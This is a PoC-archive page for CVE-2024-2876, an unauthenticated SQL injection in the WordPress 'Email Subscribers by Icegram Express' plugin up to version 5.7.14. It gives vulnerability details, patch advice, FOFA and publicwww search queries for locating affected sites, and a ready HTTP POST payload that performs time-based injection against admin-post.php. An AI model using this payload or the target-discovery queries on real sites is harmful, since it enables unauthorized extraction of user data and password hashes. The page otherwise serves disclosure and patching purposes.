关联漏洞
标题:WordPress Plugin email-subscribers SQL注入漏洞 (CVE-2024-2876)Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin email-subscribers 5.7.14及之前版本存在SQL注入漏洞,该漏洞源于 IG_ES_Subscribers_Query 中的 run函数对用户提供的参数转义不充分,攻击者利用该漏洞可以将额外的 SQL 查询附
介绍
# CVE-2024-2876 - SQL Injection Vulnerability in Email Subscribers by Icegram Express
## Overview
CVE-2024-2876 is a critical security vulnerability found in the "Email Subscribers by Icegram Express" plugin for WordPress. This vulnerability affects versions up to and including 5.7.14 and poses significant risks to over 90,000 websites.
### Vulnerability Details
- **CVE-ID**: CVE-2024-2876
- **CVSS Score**: 9.8 (Critical)
- **Affected Versions**: Up to 5.7.14
- **Patched Version**: 5.7.15 and above
### Description
The vulnerability is a SQL injection flaw that allows unauthenticated attackers to execute malicious SQL queries on the affected WordPress databases. By manipulating user inputs that are not properly sanitized, attackers can extract sensitive information such as usernames, email addresses, password hashes, and subscriber lists.
### Exploit Mechanism
The SQL injection occurs within the `run` function of the plugin's `IG_ES_Subscribers_Query` class, where inadequate input validation leads to unauthorized SQL code execution. This compromises the integrity and confidentiality of the data stored in the WordPress database.
## Query CVE-2024-2876
- FOFA : body="/wp-content/plugins/email-subscribers/"
- publicwww : "/wp-content/plugins/email-subscribers/"
# POC CVE-2024-2876
```python
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```
## Recommendations
1. **Immediate Update**: If you are using the "Email Subscribers by Icegram Express" plugin, upgrade to version 5.7.15 or later immediately to apply the security fix.
2. **Regular Audits**: Regularly review and update all WordPress plugins and themes to their latest versions to ensure security.
3. **Security Plugins**: Use reputable WordPress security plugins to enhance defenses against SQL injection and other cyber threats.
4. **Strong Password Policies**: Implement strong and unique passwords for all accounts related to your WordPress site to reduce unauthorized access risks.
## Impact of Non-Compliance
Failing to update the affected plugin can leave websites vulnerable to data breaches and unauthorized access. Given the widespread use of this plugin, immediate action is crucial to secure installations.
文件快照
[4.0K] /data/pocs/a002f5bd224a1590fd7ec1e55970990d7296e1db
├── [ 845] CVE-2024-2876.yaml
└── [2.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →